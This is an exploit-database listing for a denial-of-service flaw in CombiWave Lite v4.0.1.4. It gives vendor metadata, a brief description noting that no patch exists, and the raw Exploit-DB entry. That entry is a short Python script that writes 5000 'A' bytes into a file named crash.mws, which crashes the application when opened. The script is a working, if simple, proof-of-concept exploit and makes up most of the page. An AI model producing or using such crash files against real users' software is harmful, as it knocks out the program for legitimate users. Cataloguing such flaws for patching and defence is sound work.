header-logo
Suggest Exploit
vendor:
CombiWave Lite
by:
Oh Yaw Theng
7,5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: CombiWave Lite
Affected Version From: v4.0.1.4
Affected Version To: v4.0.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:combiwave_lite:combiwave_lite:4.0.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2
2010

CombiWave Lite v4.0.1.4 (.mws) DoS

CombiWave Lite v4.0.1.4 is vulnerable to a denial of service attack when a specially crafted .mws file is opened. The application will crash when the file is opened, denying service to legitimate users.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: CombiWave Lite v4.0.1.4 (.mws) DoS
# Date: 12 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.topdownloads.net/software/combiwave-lite_2_219101.html?hl=&ia=0
# Version: v4.0.1.4
# Tested on: Windows XP SP 2
# CVE : N / A

#!/usr/bin/python

filename = "crash.mws"

junk = "\x41" * 5000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()